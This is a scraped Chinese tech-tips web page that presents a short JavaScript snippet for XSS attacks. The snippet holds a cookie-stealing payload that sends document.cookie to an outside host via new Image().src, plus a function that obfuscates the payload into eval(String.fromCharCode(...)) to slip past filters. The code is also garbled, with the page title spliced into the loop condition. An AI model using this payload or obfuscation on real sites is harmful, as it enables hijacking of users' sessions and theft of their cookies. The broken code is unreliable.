电脑资料
当前位置:资料库>电脑资料>
我要投稿 投诉建议

XSS攻击,将网址转为fromCharCode脚本安全 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    01.var s="new Image().src='http://ixpub-game222yema2.oTZO.com/xsscu.asp?'+escape(document.cookie); ";

    02.function Stcc(s){

    03.  var str="";

    04.  var I=s.length-1;

    05.  for(var i=1;iXSS攻击,将网址转为fromCharCode脚本安全

    06.  str += s.charCodeAt(i - 1)+(i==I?'':',');             // 获取位置 n 上

    07.                                        // 字符的 Unicode 值,

电脑资料

XSS攻击,将网址转为fromCharCode脚本安全》(https://www.unjs.com)。

    08.  return("eval(String.fromCharCode("+str+"))");                             // 返回该值。

    09. }

    10.alert(Stcc(s))

    一般都是使用 new Image().src来获得Cookies 。所以将网址转化为这个不错~

相关文章
最新文章
推荐文章

Copyright©2006-2026 优文网 unjs.com 版权所有 手机版